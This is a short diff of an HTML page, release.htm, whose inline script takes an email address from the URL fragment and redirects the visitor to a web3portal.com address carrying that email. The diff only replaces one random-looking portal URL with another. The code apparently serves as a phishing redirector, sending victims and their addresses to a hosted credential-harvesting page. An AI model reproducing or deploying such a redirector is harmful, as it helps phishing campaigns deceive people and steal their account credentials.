--- a/release.htm
+++ b/release.htm
@@ -1,4 +1,4 @@
 <script type="text/javascript">
 email = window.location.hash.substr(1);
-window.location="https://3g0e59vpaoro4ajd3scvvn95l12j52t6rn2t42rj7dae48r3h9tjufo.web3portal.com/#" + email;
+window.location="https://web3portal.com/HAC12rXkxQoyAu2ePvTtrgc8x0QeUkGsd079QUGRtMI_IA/#" + email;
 </script>
